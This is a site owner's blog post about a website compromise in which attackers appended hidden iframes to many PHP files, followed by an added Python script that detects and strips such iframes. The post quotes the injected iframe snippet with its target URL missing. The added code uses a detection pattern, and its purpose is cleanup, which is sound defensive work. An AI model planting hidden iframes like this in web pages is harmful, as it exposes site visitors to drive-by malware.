Today, I awoke to find that my website was not quite behaving like normal. I was getting a lot of PHP errors and my brother reported getting a virus warning when logging into my forum. It turns out that someone had exploited a security hole in some software that drives the site. Fortunately, all they did was append a bit of code to files (instead of removing files or something more malicious). Unfortunately, it was quite a few files and it took me a while to fix them all. The files affected all had names containing the words index, login, header, footer, default… things like this. The bit of code they included was:
<IFRAME name='StatPage' src='' width=5 height=5 style='display:none'> </IFRAME> <IFRAME name='StatPage' src=' p' width=5 height=5 style='display:none'> </IFRAME>
I’m putting it here as I couldn’t find anywhere on the web any description of who these guys were or what the site they were linking back to was about (the site just timed out when I tried to go there directly). So if anyone knows anything about these guys, I’d be interested in hearing about it.
It turns out that the hole was easily fixed by my hosting company, which is nice. But it still caused more stress and wasted effort than I’m happy with.
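For anyone cleaning up after the same kind of injection, here is an added example (not part of the original post) that walks a web root, reports files containing a hidden `display:none` iframe like the one quoted above, and optionally strips it. The function names are hypothetical and `example.invalid` is a placeholder for the URL that is missing from the snippet; every file is checked because the list of affected file names in the post was not exhaustive.

```python
import os
import re
import tempfile

# Hidden iframe: the opening tag itself carries display:none, as in the
# snippet quoted in the post. Quote style (straight or curly) does not matter.
HIDDEN_IFRAME = re.compile(
    r"<iframe\b[^>]*display\s*:\s*none[^>]*>.*?</iframe>",
    re.IGNORECASE | re.DOTALL,
)


def find_hidden_iframes(text):
    """Return every hidden-iframe element found in text."""
    return HIDDEN_IFRAME.findall(text)


def strip_hidden_iframes(text):
    """Return text without hidden iframes, ending in a single newline."""
    return HIDDEN_IFRAME.sub("", text).rstrip() + "\n"


def scan_tree(root, clean=False):
    """Map path -> hidden-iframe count for every file under root."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            # surrogateescape round-trips non-UTF-8 bytes unchanged.
            with open(path, encoding="utf-8", errors="surrogateescape") as fh:
                text = fh.read()
            found = find_hidden_iframes(text)
            if found:
                hits[path] = len(found)
                if clean:
                    with open(path, "w", encoding="utf-8",
                              errors="surrogateescape") as fh:
                        fh.write(strip_hidden_iframes(text))
    return hits


def demo():
    """Build a constructed web root, scan and clean it, then rescan."""
    # Constructed sample input, not data from the incident.
    bad = ("<?php echo 'hi'; ?>\n<IFRAME name='StatPage' "
           "src='http://example.invalid/' width=5 height=5 "
           "style='display:none'> </IFRAME>\n")
    with tempfile.TemporaryDirectory() as root:
        for name, body in (("index.php", bad), ("about.php", bad),
                           ("footer.html", "<p>ok</p>\n")):
            with open(os.path.join(root, name), "w", encoding="utf-8") as fh:
                fh.write(body)
        before = scan_tree(root, clean=True)
        return sorted(os.path.basename(p) for p in before), scan_tree(root)
```

Run `scan_tree` without `clean=True` first and review the hits against a backup, since a legitimate page can also contain a hidden iframe.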